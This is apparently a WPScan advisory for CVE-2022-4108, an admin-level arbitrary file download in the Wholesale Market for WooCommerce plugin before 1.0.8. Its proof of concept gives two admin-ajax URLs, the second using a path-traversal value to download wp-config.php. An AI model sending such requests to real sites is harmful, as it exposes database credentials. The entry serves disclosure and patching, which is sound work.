WordPress Plugin Vulnerabilities

Wholesale Market for WooCommerce < 1.0.8 - Admin+ Arbitrary File Download

Description

The plugin does not validate user input used to generate system path, allowing high privilege users such as admin to download arbitrary file from the server even when they should not be able to (for example in multisite)

Proof of Concept

First call https://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv which will create the log directory

Then call http://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&nonce=&ced_cwsm_log_download=../../../wp-config.php to download the wp-config.php

Affects Plugins

Plugin icon
wholesale-market-for-woocommerce
Fixed in 1.0.8

References

CVE
CVE-2022-4108

Classification

Type
FILE DOWNLOAD
OWASP top 10
A1: Injection
CWE
CWE-552
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
WPScan
Verified
Yes
WPVDB ID
9d1770df-91f0-41e3-af0d-522ae4e62470

Timeline

Publicly Published
2022-11-28 (about 1 years ago)
Added
2022-11-28 (about 1 years ago)
Last Updated
2022-11-28 (about 1 years ago)

Other

Published
Title
Published
2022-04-05
Title
Download Monitor < 4.5.91 - Admin+ Arbitrary File Download
Published
2022-12-05
Title
Welcart e-Commerce < 2.8.5 - Subscriber+ Arbitrary File Access
Published
2022-01-10
Title
SEUR Oficial < 1.7.2 - Admin+ Arbitrary File Download
Published
2024-04-03
Title
File Manager < 7.2.6 - Authenticated (Administrator+) Directory Traversal
Published
2023-06-12
Title
wpForo Forum < 2.1.8 - Subscriber+ Arbitrary File Read, Author+ PHAR Deserialization, and Subscriber+ Server-Side Request Forgery via file_get_contents